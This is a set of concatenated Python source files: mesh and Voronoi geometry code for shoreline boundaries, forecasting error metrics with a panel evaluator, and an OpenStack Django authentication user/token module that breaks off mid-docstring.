coll = LineCollection(all_lines)
ax = plt.gca()
ax.add_collection(coll)
def load_triangle_elements(ele_file):
fp = open(ele_file,'rt')
n_elts, nodes_per_elt, n_attrs = map(int,fp.readline().split())
tris = np.zeros( (n_elts,3), np.int32)
for i in range(n_elts):
dummy, tris[i,0],tris[i,1],tris[i,2] = map(int,fp.readline().split()[:4])
return tris
def plot_elements(tris,nodes):
edges = set()
for t in range(tris.shape[0]):
t_verts = np.sort(tris[t])
edges.add( (t_verts[0],t_verts[1]) )
edges.add( (t_verts[0],t_verts[2]) )
edges.add( (t_verts[1],t_verts[2]) )
edges = np.array(list(edges))
all_lines = nodes[edges]
coll = LineCollection(all_lines)
ax = plt.gca()
ax.add_collection(coll)
# that writes out these files:
# node_file = poly_file.replace('.poly','.1.node')
# element_file = poly_file.replace('.poly','.1.ele')
# tris = load_triangle_elements(element_file)
# nodes = load_triangle_nodes(node_file)
# plot_elements(tris,nodes)
# Look into how to compute the local radius based on the voronoi
# diagram:
# Find the radius at each voronoi center:
# 1. load the voronoi nodes:
# some sort of issue loading the tri information - might be worth
# trying it w/o any islands, but first taking a look...
# nodes: 2-D, 0 attributes, 1 boundary marker
# 8690 nodes (compare to 8003 nodes in input)
class Graph(object):
def __init__(self,basename):
node_file = basename + '.node'
if os.path.exists(node_file):
self.nodes = load_triangle_nodes(node_file)
else:
self.nodes = None
edge_file = basename + '.edge'
if os.path.exists(edge_file):
self.edges = load_triangle_edges(edge_file)
else:
self.edges = None
element_file = basename + '.ele'
if os.path.exists(element_file):
self.elements = load_triangle_elements(element_file)
else:
self.elements = None
def plot(self,colors=None):
if self.edges is not None:
self.plot_edges(colors=colors)
else:
self.plot_elements(colors=colors)
def plot_edges(self,colors=None):
all_lines = self.nodes[self.edges]
coll = LineCollection(all_lines)
if colors is not None:
coll.set_array(colors)
ax = plt.gca()
ax.add_collection(coll)
plt.draw()
def plot_elements(self,colors=None):
i = np.array([0,1,2,0])
all_lines = self.nodes[self.elements[:,i]]
coll = LineCollection(all_lines)
if colors is not None:
coll.set_array(colors)
ax = plt.gca()
ax.add_collection(coll)
plt.draw()
_vcenters = None
def vcenters(self):
if self.elements is None:
raise Exception("vcenters() called but elements is None")
if self._vcenters is None:
# just copied from trigrid
self._vcenters = np.zeros(( len(self.elements),2 ), np.float64)
p1x = self.nodes[self.elements[:,0]][:,0]
p1y = self.nodes[self.elements[:,0]][:,1]
p2x = self.nodes[self.elements[:,1]][:,0]
p2y = self.nodes[self.elements[:,1]][:,1]
p3x = self.nodes[self.elements[:,2]][:,0]
p3y = self.nodes[self.elements[:,2]][:,1]
# taken from TRANSFORMER_gang.f90
dd=2.0*((p1x-p2x)*(p1y-p3y) -(p1x-p3x)*(p1y-p2y))
b1=p1x**2+p1y**2-p2x**2-p2y**2
b2=p1x**2+p1y**2-p3x**2-p3y**2
xc=(b1*(p1y-p3y)-b2*(p1y-p2y))/dd
yc=(b2*(p1x-p2x)-b1*(p1x-p3x))/dd
self._vcenters[:,0] = xc
self._vcenters[:,1] = yc
return self._vcenters
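# Added commentary on the circumcenter formula used in vcenters() above:
# the center c = (xc, yc) is equidistant from p1, p2 and p3, so expanding
# |c - p1|^2 = |c - p2|^2 and |c - p1|^2 = |c - p3|^2 gives the linear system
#   2*(p1x - p2x)*xc + 2*(p1y - p2y)*yc = b1
#   2*(p1x - p3x)*xc + 2*(p1y - p3y)*yc = b2
# with b1, b2 as defined in the code. Solving this 2x2 system (the leftover
# factors of two fold into dd) yields exactly the xc, yc expressions above.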
_radii = None
def radii(self):
if self._radii is None:
vcenters = self.vcenters()
vcorners = self.nodes[self.elements[:,0]]
self._radii = np.sqrt( ((vcenters - vcorners)**2).sum(axis=1) )
return self._radii
_nodes2elements = None
def nodes2elements(self,n1,n2):
if self._nodes2elements is None:
e2e = {}
print("building hash of edges to elements")
for c in range(len(self.elements)):
for i in range(3):
a = self.elements[c,i]
b = self.elements[c,(i+1)%3]
if a > b:
a,b = b,a
k = (a,b)
if not e2e.has_key(k):
e2e[k] = []
e2e[ k ].append(c)
self._nodes2elements = e2e
print("done")
if n1 > n2:
n1,n2 = n2,n1
return self._nodes2elements[(n1,n2)]
class Boundary(object):
n_cleaned = 0 # bean-counter for remove_repeated
def __init__(self,geo=None,nodes=None,clean_geo=True):
"""
geo: a Shapely polygon (with holes, ok)
nodes: an array of points, taken to be the exterior ring of a polygon
clean_geo: if true, traverse the rings and remove repeated nodes
"""
if geo:
all_nodes = []
all_edges = []
holes = []
start_n = 0
rings = [geo.exterior] + list(geo.interiors)
for ring in rings:
orig_nodes = np.array(ring.coords)
if clean_geo:
orig_nodes = self.remove_repeated(orig_nodes)
# remove repeated last coordinate
these_nodes = orig_nodes[:-1]
n_nodes = these_nodes.shape[0]
n = np.arange(n_nodes)
these_edges = start_n + np.transpose( np.array([n,(n+1)%n_nodes]) )
all_nodes.append(these_nodes)
all_edges.append(these_edges)
start_n += n_nodes
ring_poly = geometry.Polygon( these_nodes )
point_inside = point_in_polygon(ring_poly)
holes.append(point_inside)
self.nodes = np.concatenate( all_nodes ) # array(geo.exterior.coords)[:-1,:]
self.edges = np.concatenate( all_edges )
self.holes = np.array(holes[1:])
self.geo = geo
if clean_geo:
print("Removed %i repeated nodes"%self.n_cleaned)
else:
self.nodes = nodes
n_nodes = self.nodes.shape[0]
# construct an edge array that just matches consecutive
# nodes
n = np.arange(n_nodes)
self.edges = np.transpose(np.array([n,(n+1)%n_nodes]))
self.holes = np.zeros((0,2))
# automatically find a basic lower-bound length scale
min_dist_sqr = (((self.nodes[1:] - self.nodes[:-1])**2).sum(axis=1)).min()
self.min_edge_length = np.sqrt(min_dist_sqr)
#print("Minimum edge length in boundary inputs is ",self.min_edge_length)
self._vor = None
self._tri = None
_nodes2edge = None
def nodes2edge(self,a,b):
# if a,b is boundary edge, return the edge id, otherwise return None
if self._nodes2edge is None:
self._nodes2edge = {}
for e in range(len(self.edges)):
c,d = self.edges[e]
if c > d:
d,c = c,d
self._nodes2edge[ (c,d) ] = e
if a>b:
b,a = a,b
k = (a,b)
if self._nodes2edge.has_key(k):
return self._nodes2edge[k]
else:
return None
def remove_repeated(self,ring):
"""Remove repeated nodes from an array.
"""
mask = np.zeros( len(ring),np.bool8 )
mask[:-1] = np.all(ring[:-1]==ring[1:],axis=1)
# for i in range(len(ring)-1):
# if all(ring[i+1]==ring[i]):
# mask[i] = True
self.n_cleaned += mask.sum()
return ring[~mask,:]
def vor(self):
if self._vor is None:
self.triangulate()
return self._vor
def triangulation(self):
if self._tri is None:
self.triangulate()
return self._tri
def plot(self,colors=None):
all_lines = self.nodes[self.edges]
coll = LineCollection(all_lines)
if colors is not None:
coll.set_array(colors)
ax = plt.gca()
ax.add_collection(coll)
# if len(self.holes) > 0:
# plot(self.holes[:,0],self.holes[:,1],'ro')
plt.draw()
def plot_lines(self):
plt.plot(self.nodes[:,0], self.nodes[:,1], 'k')
def split_edges(self,edge_indexes):
new_nodes = np.nan * np.ones((len(edge_indexes),2), np.float64)
new_edges = -1 * np.ones((len(edge_indexes),2), np.int32)
# remember what the next free edge and node are
next_edge = self.edges.shape[0]
next_node = self.nodes.shape[0]
# extend nodes and edges:
self.nodes = np.concatenate( (self.nodes,new_nodes), axis=0 )
self.edges = np.concatenate( (self.edges,new_edges), axis=0 )
ordering = np.arange(self.nodes.shape[0],dtype=np.float64)
ordering[next_node:] = -1
for i in range(len(edge_indexes)):
# node indices to the old endpoints
pntA,pntC = self.edges[edge_indexes[i]]
pntB = next_node+i
self.nodes[pntB] = 0.5*(self.nodes[pntA] + self.nodes[pntC])
self.edges[edge_indexes[i],1] = pntB
self.edges[next_edge+i] = [pntB,pntC]
ordering[pntB] = 0.5*(ordering[pntA]+ordering[pntC])
new_order = np.argsort(ordering)
# so j = new_order[i] means that old node j will get mapped
# to new node i
self.nodes = self.nodes[new_order]
# the "inverse" of new_order
mapping = np.argsort(new_order)
# not sure about this. too late to prove it to myself that
# it works short of just testing it
self.edges = mapping[self.edges]
self._nodes2edge = None
def write_poly(self,poly_filename):
""" write a triangle compatible poly file
"""
# and then only the exterior ring:
point_list = self.nodes
# probably unnecessary
if np.all(point_list[0]==point_list[-1]):
raise Exception("Boundary should have already stripped any repeated endpoints")
npoints = point_list.shape[0]
# triangle wants the basic planar-straight-line-graph
poly_fp = open(poly_filename,'wt')
# first line is
# First line: <# of vertices> <dimension (must be 2)> <# of attributes> <# of boundary markers (0 or 1)>
poly_fp.write("%i 2 0 0\n"%(npoints))
# Write out vertices
for i in range(npoints):
# <vertex #> <x> <y> [attributes] [boundary marker]
poly_fp.write("%i %f %f\n"%(i,point_list[i,0],point_list[i,1]))
# Write out segments
# <# of segments> <# of boundary markers (0 or 1)>
poly_fp.write("%i 0\n"%(npoints))
for i in range(len(self.edges)):
# <segment #> <endpoint> <endpoint> [boundary marker]
poly_fp.write("%i %i %i\n"%(i,self.edges[i,0],self.edges[i,1]))
# number of holes
poly_fp.write( "%d\n"%self.holes.shape[0] )
for i in range(self.holes.shape[0]):
poly_fp.write("%d %f %f\n"%(i, self.holes[i,0], self.holes[i,1]) )
poly_fp.close()
# def triangulate(self):
# ### Run some triangle stuff:
# poly_file = "test2.poly"
# self.write_poly(poly_file)
#
# cmd = "%s -e -D -p -v %s"%(triangle_path,poly_file)
# subprocess.call(cmd,shell=True) # ,stdout=file('/dev/null','w') )
#
# # probably we should get the real geometry that was used, otherwise
# # things will get confusing
# self.read_poly('test2.1.poly')
#
# self._tri = Graph('test2.1')
# self._vor = VoronoiDiagram('test2.1.v')
def read_poly(self,poly_file):
""" After triangulating, there may have been Steiner points
added, and they will exist in the output .poly file.
This reads that file and replaces self.nodes and self.edges
with the information in the given polyfile. Holes will be
kept the same (although it would be valid to re-read holes, too).
"""
poly_fp = open(poly_file,'rt')
new_edges = []
new_nodes = []
n_nodes,dim,n_attrs,n_markers = map(int,poly_fp.readline().split())
if n_nodes == 0:
# print("Reading nodes from separate file")
new_nodes = load_triangle_nodes(poly_file.replace('.poly','.node'))
else:
raise Exception("Not ready for reading inline nodes")
n_segments,n_markers = map(int,poly_fp.readline().split())
new_edges = np.zeros((n_segments,dim), np.int32)
for i in range(n_segments):
vals = map(int,poly_fp.readline().split())
new_edges[i] = vals[1:3]
# install the new data:
self.edges = new_edges
self.nodes = new_nodes
self.geo = None
self.src = poly_file
def subdivide(self):
""" Find edges that need to be sampled with smaller
steps and divide them into two edges.
returns the number of new edges / nodes
method: calculate voronoi radii
iterate over edges in boundary
for each edge, find the voronoi point that they have
in common. So this edge should be part of a triangle,
and we are getting the center of that triangle.
compare the voronoi radius with the distance between the voronoi
point and the edge. If the edge is too long and needs to
be subdivided, it will be long (and the voronoi radius large)
compared to the distance between the edge and the vor. center.
Can this be done without the vor. radii?
need
"""
# the old way calculated voronoi radii and searched for nodes
# on those circumcircles. For subdividing, we just need to match
# each edge with the one voronoi point it belongs to.
# vor = self.vor()
# vor.calc_radii(self.nodes)
# the new way - calculated voronoi points directly from the triangles
# in the delaunay triangulation, then match with edges with a hash
# on edge [a,b] node pairs
triangulation = self.triangulation()
vcenters = triangulation.vcenters()
n_edges = self.edges.shape[0]
to_subdivide = np.zeros(n_edges, np.float64)
# the only way this works is for the boundary nodes to be exactly
# the same, so we go boundary edge -> nodes -> delaunay element
if np.any( self.nodes != triangulation.nodes ):
raise Exception("Triangulation and boundary use different nodes.")
print("Choosing edges to subdivide")
for i in range(n_edges): # over boundary edges
a,b = self.edges[i]
elements = triangulation.nodes2elements(a,b)
if len(elements) != 1:
print("Edge %d,%d mapped to elements %s"%(a,b,elements))
raise Exception("Boundary edges should map to exactly one element")
element = elements[0]
# compute the point-line distance between
# this edge and the v center, then compare to
# the distance from the endpoint to that
# vcenter
pntV = vcenters[element]
pntA = self.nodes[a]
pntB = self.nodes[b]
v_radius = np.sqrt( ((pntA-pntV)**2).sum() )
line_clearance = np.sqrt( (( 0.5*(pntA+pntB) - pntV)**2).sum() )
if v_radius > 1.2*line_clearance and v_radius > self.min_edge_length:
# second check - make sure that neither AC nor BC are also on the
# boundary
p1,p2,p3 = triangulation.elements[element]
count = 0
if self.nodes2edge(p1,p2) is not None:
count += 1
if self.nodes2edge(p2,p3) is not None:
count += 1
if self.nodes2edge(p3,p1) is not None:
count += 1
if count == 1:
to_subdivide[i] = 3
elif count == 0:
global bad_boundary
bad_boundary = self
print("While looking at edge %d=(%d,%d)"%(i,a,b))
raise Exception("We should have found at least 1 boundary edge")
elif count == 3:
print("WARNING: Unexpected count of boundary edges in one element: ",count)
# if 2, then it's a corner and we probably don't want to subdivide
self.to_subdivide = to_subdivide
bad_edges = np.where(to_subdivide)[0]
self.split_edges( bad_edges )
# invalidate these:
self._vor = None
self._tri = None
return len(bad_edges)
def subdivide_iterate(self):
while 1:
n_new = self.subdivide()
print("Subdivide made %d new nodes"%n_new)
if n_new == 0:
break
class VoronoiDiagram(Graph):
radii = None
dual_nodes = None
dual_lookup = {}
def calc_radii(self,del_nodes):
""" for each of the voronoi points, find it's radius and
which delaunay points are responsible for it.
"""
n_nodes = self.nodes.shape[0]
self.radii = np.zeros( n_nodes, np.float64)
self.dual_nodes = [None]*n_nodes
self.dual_lookup = {} # map dual node index to list of vcenters
# this is where all the time goes!
# so make a field for the delaunay nodes that will speed up finding them
I = np.arange(len(del_nodes))
del_field = field.XYZField(del_nodes, 'nope')
del_field.build_index()
for i in range(n_nodes):
if i % 1000 == 0:
print(i)
# find the nearest one...
nearest = del_field.nearest(self.nodes[i])
min_radius = np.sqrt( ((del_nodes[nearest] - self.nodes[i])**2).sum() )
all_near = del_field.within_r(self.nodes[i], 1.00000001*min_radius)
# dists_sqr = ((del_nodes - self.nodes[i,:])**2).sum(axis=1)
# rad_sqr = dists_sqr.min()
# self.dual_nodes[i] = find( dists_sqr <= 1.00001*rad_sqr )
self.dual_nodes[i] = np.array(all_near)
for dual_node_idx in self.dual_nodes[i]:
if not self.dual_lookup.has_key(dual_node_idx):
self.dual_lookup[dual_node_idx] = []
self.dual_lookup[dual_node_idx].append(i)
self.radii[i] = min_radius # sqrt(rad_sqr)
def merge_points(self,tol):
""" After a call to calc_radii(), this can be called to coalesce voronio points
that are close to each other
"""
while len(self.nodes) > 1:
# look for short edges:
edge_ends = self.nodes[ self.edges ]
edge_centers = edge_ends.mean(axis=1)
edge_tols = tol(edge_centers)
edge_lengths = np.sqrt( ((edge_ends[:,1,:] - edge_ends[:,0,:])**2).sum(axis=1) )
rel_edge_lengths = edge_lengths / edge_tols
to_merge = np.argmin(rel_edge_lengths)
if rel_edge_lengths[ to_merge ] < 1.0:
# print(" got an edge to merge.")
self.merge_edge( to_merge )
else:
break
def merge_edge(self,e):
a,b = self.edges[e]
# print("merging voronoi edge ",a,b)
self.edges = np.concatenate( (self.edges[:e], self.edges[e+1:]) )
# map old node indices to new ones:
node_mapping = np.arange(len(self.nodes))
# b has become a
node_mapping[b] = a
# and everybody greater than b is shifted down
node_mapping[ node_mapping > b] -= 1
if self.radii is not None:
self.radii = np.concatenate( (self.radii[:b], self.radii[b+1:]) )
# combine their dual nodes:
self.dual_nodes[a] = np.unique( np.concatenate( (self.dual_nodes[a],self.dual_nodes[b]) ) )
# then remove b from the list
self.dual_nodes = self.dual_nodes[:b] + self.dual_nodes[b+1:]
for k in self.dual_lookup.keys():
l = self.dual_lookup[k]
# k is an index to the boundary points
# l is a list of indices to voronoi centers
if b in l:
l.remove( b )
if not a in l:
l.append(a)
# keep it as a list for now.
self.dual_lookup[k] = node_mapping[ np.array(l) ].tolist()
# new node is between the old two nodes:
self.nodes[a] = 0.5*(self.nodes[a] + self.nodes[b])
self.edges = node_mapping[ self.edges ]
self.nodes = np.concatenate( (self.nodes[:b], self.nodes[b+1:] ) )
def centers_for_dual_node(self,dual_node):
if self.dual_lookup.has_key(dual_node):
return self.dual_lookup[dual_node]
else:
return []
def plot_radii(self):
a = plt.gca()
for i in range(self.nodes.shape[0]):
cir = Circle( self.nodes[i], radius=self.radii[i])
a.add_patch(cir)
def plot_vor_points(self):
try:
colors = self.radii
print("Got colors from radii")
plt.scatter(self.nodes[:,0],self.nodes[:,1],50,colors,
lw=0,vmin=200,vmax=250)
except:
plt.plot(self.nodes[:,0],self.nodes[:,1],'r+')
def plot(self,show_vor_points=True):
if show_vor_points:
self.plot_vor_points()
# plot the finite edges:
# build up the list of lines:
all_lines = self.nodes[self.edges]
coll = LineCollection(all_lines)
coll.set_color('m')
ax = plt.gca()
ax.add_collection(coll)
plt.draw()
# since the triangulation didn't add any nodes, just
# use the boundaries nodes instead of tri.nodes
# ### Check radius against edge / voronoi center
# if __name__ == '__main__':
# ### Load the data
# # boundary = load_shp.Boundary('/home/rusty/classes/research/meshing/dumbarton.shp')
#
# # this is full bay, already filtered at 50m
# boundary = load_shp.Boundary('/home/rusty/classes/research/spatialdata/us/ca/suntans/shoreline/noaa-medres/sfbay-100km-arc/sfbay-100km-arc-50_20.shp')
#
# geo = boundary.geo
#
# # points = array( geo.exterior.coords )
# # points = points[:-1]
#
# # from paver import upsample_linearring
# # points = upsample_linearring(points,50)
#
# bdry_ma = Boundary( geo=geo )
# print("subdividing...")
# bdry_ma.subdivide_iterate()
# print("done")
#
# vor = bdry_ma.vor()
# #tri = bdry_ma.tri()
# #tri.plot()
#
# print("Calculating radii")
# vor.calc_radii(bdry_ma.nodes)
# print("done")
#
# bdry_ma.plot()
# bdry_ma.vor().plot_vor_points()
# plt.axis('equal')
# plt.draw()
#!/usr/bin/env python
# coding: utf-8
import numpy as np
import pandas as pd
from functools import partial
from math import sqrt
from multiprocessing import Pool
from typing import Callable, Optional
AVAILABLE_METRICS = ['mse', 'rmse', 'mape', 'smape', 'mase', 'rmsse',
'mini_owa', 'pinball_loss']
######################################################################
# METRICS
######################################################################
def mse(y: np.array, y_hat:np.array) -> float:
"""Calculates Mean Squared Error.
MSE measures the prediction accuracy of a
forecasting method by calculating the squared deviation
of the prediction and the true value at a given time and
averaging these deviations over the length of the series.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar:
MSE
"""
mse = np.mean(np.square(y - y_hat))
return mse
def rmse(y: np.array, y_hat:np.array) -> float:
"""Calculates Root Mean Squared Error.
RMSE measures the prediction accuracy of a
forecasting method by calculating the squared deviation
of the prediction and the true value at a given time and
averaging these deviations over the length of the series.
Finally the RMSE will be in the same scale
as the original time series so its comparison with other
series is possible only if they share a common scale.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar: RMSE
"""
rmse = sqrt(np.mean(np.square(y - y_hat)))
return rmse
def mape(y: np.array, y_hat:np.array) -> float:
"""Calculates Mean Absolute Percentage Error.
MAPE measures the relative prediction accuracy of a
forecasting method by calculating the percentage deviation
of the prediction and the true value at a given time and
averaging these deviations over the length of the series.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar: MAPE
"""
mape = np.mean(np.abs(y - y_hat) / np.abs(y))
mape = 100 * mape
return mape
def smape(y: np.array, y_hat:np.array) -> float:
"""Calculates Symmetric Mean Absolute Percentage Error.
SMAPE measures the relative prediction accuracy of a
forecasting method by calculating the relative deviation
of the prediction and the true value scaled by the sum of the
absolute values for the prediction and true value at a
given time, then averaging these deviations over the length
of the series. This allows the SMAPE to have bounds between
0% and 200% which is desirable compared to normal MAPE that
may be undetermined.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
Returns
-------
scalar: SMAPE
"""
scale = np.abs(y) + np.abs(y_hat)
scale[scale == 0] = 1e-3
smape = np.mean(np.abs(y - y_hat) / scale)
smape = 200 * smape
return smape
def mase(y: np.array, y_hat: np.array,
y_train: np.array, seasonality: int = 1) -> float:
"""Calculates the M4 Mean Absolute Scaled Error.
MASE measures the relative prediction accuracy of a
forecasting method by comparing the mean absolute errors
of the prediction and the true value against the mean
absolute errors of the seasonal naive model.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array
predicted values
y_train: numpy array
actual train values for Naive1 predictions
seasonality: int
main frequency of the time series
Hourly 24, Daily 7, Weekly 52,
Monthly 12, Quarterly 4, Yearly 1
Returns
-------
scalar: MASE
"""
scale = np.mean(abs(y_train[seasonality:] - y_train[:-seasonality]))
mase = np.mean(abs(y - y_hat)) / scale
mase = 100 * mase
return mase
def rmsse(y: np.array, y_hat: np.array,
y_train: np.array, seasonality: int = 1) -> float:
"""Calculates the M5 Root Mean Squared Scaled Error.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array of len h (forecasting horizon)
predicted values
y_train: numpy array
actual train values
seasonality: int
main frequency of the time series
Hourly 24, Daily 7, Weekly 52,
Monthly 12, Quarterly 4, Yearly 1
Returns
-------
scalar: RMSSE
"""
scale = np.mean(np.square(y_train[seasonality:] - y_train[:-seasonality]))
rmsse = sqrt(mse(y, y_hat) / scale)
rmsse = 100 * rmsse
return rmsse
def mini_owa(y: np.array, y_hat: np.array,
y_train: np.array,
seasonality: int,
y_bench: np.array):
"""Calculates the Overall Weighted Average for a single series.
MASE, sMAPE for Naive2 and current model
then calculates the Overall Weighted Average.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array of len h (forecasting horizon)
predicted values
y_train: numpy array
insample values of the series for scale
seasonality: int
main frequency of the time series
Hourly 24, Daily 7, Weekly 52,
Monthly 12, Quarterly 4, Yearly 1
y_bench: numpy array of len h (forecasting horizon)
predicted values of the benchmark model
Returns
-------
return: mini_OWA
"""
mase_y = mase(y, y_hat, y_train, seasonality)
mase_bench = mase(y, y_bench, y_train, seasonality)
smape_y = smape(y, y_hat)
smape_bench = smape(y, y_bench)
mini_owa = ((mase_y/mase_bench) + (smape_y/smape_bench))/2
return mini_owa
def pinball_loss(y: np.array, y_hat: np.array, tau: float = 0.5):
"""Calculates the Pinball Loss.
The Pinball loss measures the deviation of a quantile forecast.
By weighting the absolute deviation in a non symmetric way, the
loss pays more attention to under or over estimation.
A common value for tau is 0.5 for the deviation from the median.
Parameters
----------
y: numpy array
actual test values
y_hat: numpy array of len h (forecasting horizon)
predicted values
tau: float
Fixes the quantile against which the predictions are compared.
Returns
-------
return: pinball_loss
"""
delta_y = y - y_hat
pinball = np.maximum(tau * delta_y, (tau-1) * delta_y)
pinball = pinball.mean()
return pinball
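# --- Worked example (added commentary, not part of the original module).
# --- With y = np.array([2., 2.]) and y_hat = np.array([1., 3.]):
# ---   mse(y, y_hat)          -> mean([1, 1])              = 1.0
# ---   mape(y, y_hat)         -> 100 * mean([0.5, 0.5])    = 50.0
# ---   smape(y, y_hat)        -> 200 * mean([1/3, 1/5])    ~ 53.3
# ---   pinball_loss(y, y_hat) -> mean([0.5, 0.5])          = 0.5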
######################################################################
# PANEL EVALUATION
######################################################################
def _evaluate_ts(uid, y_test, y_hat,
y_train, metric,
seasonality, y_bench, metric_name):
y_test_uid = y_test.loc[uid].y.values
y_hat_uid = y_hat.loc[uid].y_hat.values
if metric_name in ['mase', 'rmsse']:
y_train_uid = y_train.loc[uid].y.values
evaluation_uid = metric(y=y_test_uid, y_hat=y_hat_uid,
y_train=y_train_uid,
seasonality=seasonality)
elif metric_name in ['mini_owa']:
y_train_uid = y_train.loc[uid].y.values
y_bench_uid = y_bench.loc[uid].y_hat.values
evaluation_uid = metric(y=y_test_uid, y_hat=y_hat_uid,
y_train=y_train_uid,
seasonality=seasonality,
y_bench=y_bench_uid)
else:
evaluation_uid = metric(y=y_test_uid, y_hat=y_hat_uid)
return uid, evaluation_uid
def evaluate_panel(y_test: pd.DataFrame,
y_hat: pd.DataFrame,
y_train: pd.DataFrame,
metric: Callable,
seasonality: Optional[int] = None,
y_bench: Optional[pd.DataFrame] = None,
threads: Optional[int] = None):
"""Calculates a specific metric for y and y_hat (and y_train, if needed).
Parameters
----------
y_test: pandas df
df with columns ['unique_id', 'ds', 'y']
y_hat: pandas df
df with columns ['unique_id', 'ds', 'y_hat']
y_train: pandas df
df with columns ['unique_id', 'ds', 'y'] (train)
This is used in the scaled metrics ('mase', 'rmsse').
metric: callable
loss function
seasonality: int
Main frequency of the time series.
Used in ('mase', 'rmsse').
Commonly used seasonalities:
Hourly: 24,
Daily: 7,
Weekly: 52,
Monthly: 12,
Quarterly: 4,
Yearly: 1.
y_bench: pandas df
df with columns ['unique_id', 'ds', 'y_hat']
predicted values of the benchmark model
This is used in 'mini_owa'.
threads: int
Number of worker processes to use. Use None (default) to let the
multiprocessing Pool use all available cores.
Returns
-------
pandas dataframe:
loss for each unique_id in the panel data
"""
metric_name = metric.__code__.co_name
uids = y_test['unique_id'].unique()
y_hat_uids = y_hat['unique_id'].unique()
assert len(y_test) == len(y_hat), "y_test and y_hat must have the same length"
assert all(uids == y_hat_uids), "y_test and y_hat must contain the same unique_ids"
y_test = y_test.set_index(['unique_id', 'ds'])
y_hat = y_hat.set_index(['unique_id', 'ds'])
if metric_name in ['mase', 'rmsse']:
y_train = y_train.set_index(['unique_id', 'ds'])
elif metric_name in ['mini_owa']:
y_train = y_train.set_index(['unique_id', 'ds'])
y_bench = y_bench.set_index(['unique_id', 'ds'])
partial_evaluation = partial(_evaluate_ts, y_test=y_test, y_hat=y_hat,
y_train=y_train, metric=metric,
seasonality=seasonality,
y_bench=y_bench,
metric_name=metric_name)
with Pool(threads) as pool:
evaluations = pool.map(partial_evaluation, uids)
evaluations = pd.DataFrame(evaluations, columns=['unique_id', 'error'])
return evaluations
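# Illustrative usage (dataframe names are hypothetical): y_test/y_train need
# columns ['unique_id', 'ds', 'y'] and y_hat needs ['unique_id', 'ds', 'y_hat'];
# the result has one row per unique_id with its 'error' value.
#   errors = evaluate_panel(y_test=test_df, y_hat=forecast_df,
#                           y_train=train_df, metric=mase,
#                           seasonality=12)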
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import logging
from django.conf import settings
from django.contrib.auth import models
from django.db import models as dbmodels
from keystoneclient.common import cms as keystone_cms
from keystoneclient import exceptions as keystone_exceptions
from openstack_auth import utils
LOG = logging.getLogger(__name__)
_TOKEN_HASH_ENABLED = getattr(settings, 'OPENSTACK_TOKEN_HASH_ENABLED', True)
def set_session_from_user(request, user):
request.session['token'] = user.token
request.session['user_id'] = user.id
request.session['region_endpoint'] = user.endpoint
request.session['services_region'] = user.services_region
# Update the user object cached in the request
request._cached_user = user
request.user = user
def create_user_from_token(request, token, endpoint, services_region=None):
# if the region is provided, use that, otherwise use the preferred region
svc_region = services_region or \
utils.default_services_region(token.serviceCatalog, request)
return User(id=token.user['id'],
token=token,
user=token.user['name'],
user_domain_id=token.user_domain_id,
# We need to consider already logged-in users with an old
# version of Token without user_domain_name.
user_domain_name=getattr(token, 'user_domain_name', None),
project_id=token.project['id'],
project_name=token.project['name'],
domain_id=token.domain['id'],
domain_name=token.domain['name'],
enabled=True,
service_catalog=token.serviceCatalog,
roles=token.roles,
endpoint=endpoint,
services_region=svc_region,
is_federated=getattr(token, 'is_federated', False),
unscoped_token=getattr(token, 'unscoped_token',
request.session.get('unscoped_token')))
class Token(object):
"""Encapsulates the AccessInfo object from keystoneclient.
Token object provides a consistent interface for accessing the keystone
token information and service catalog.
Added for maintaining backward compatibility with horizon that expects
Token object in the user object.
"""
def __init__(self, auth_ref, unscoped_token=None):
# User-related attributes
user = {}
user['id'] = auth_ref.user_id
user['name'] = auth_ref.username
self.user = user
self.user_domain_id = auth_ref.user_domain_id
self.user_domain_name = auth_ref.user_domain_name
# Token-related attributes
self.id = auth_ref.auth_token
self.unscoped_token = unscoped_token
if (_TOKEN_HASH_ENABLED and
(keystone_cms.is_asn1_token(self.id)
or keystone_cms.is_pkiz(self.id))):
algorithm = getattr(settings, 'OPENSTACK_TOKEN_HASH_ALGORITHM',
'md5')
hasher = hashlib.new(algorithm)
hasher.update(self.id)
self.id = hasher.hexdigest()
# If the scoped_token is long, then unscoped_token must be too.
hasher.update(self.unscoped_token)
self.unscoped_token = hasher.hexdigest()
self.expires = auth_ref.expires
# Project-related attributes
project = {}
project['id'] = auth_ref.project_id
project['name'] = auth_ref.project_name
self.project = project
self.tenant = self.project
# Domain-related attributes
domain = {}
domain['id'] = auth_ref.domain_id
domain['name'] = auth_ref.domain_name
self.domain = domain
# Federation-related attributes
self.is_federated = auth_ref.is_federated
if auth_ref.version == 'v2.0':
self.roles = auth_ref['user'].get('roles', [])
else:
self.roles = auth_ref.get('roles', [])
self.serviceCatalog = auth_ref.service_catalog.get_data()
class User(models.AbstractBaseUser, models.PermissionsMixin):
"""A User class with some extra special sauce for Keystone.
In addition to the standard Django user attributes, this class also has
the following:
.. attribute:: token
The Keystone token object associated with the current user/tenant.
The token object is deprecated; use auth_ref instead.
.. attribute:: tenant_id
The id of the Keystone tenant for the current user/token.
The tenant_id keyword argument is deprecated, use project_id instead.
.. attribute:: tenant_name
The name of the Keystone tenant for the current user/token.
The tenant_name keyword argument is deprecated, use project_name
instead.
.. attribute:: project_id
The id of the Keystone project for the current user/token.
.. attribute:: project_name
The name of the Keystone project for the current user/token.
.. attribute:: service_catalog
The ``ServiceCatalog`` data returned by Keystone.
.. attribute:: roles
A list of dictionaries containing role names and ids as returned
by Keystone.
.. attribute:: services_region
A list of non-identity service endpoint regions extracted from the
service catalog.
.. attribute:: user_domain_id
The domain id of the current user.
.. attribute:: user_domain_name
The domain name of the current user.
.. attribute:: domain_id
The id of the Keystone domain scoped for the current user/token.
.. attribute:: is_federated
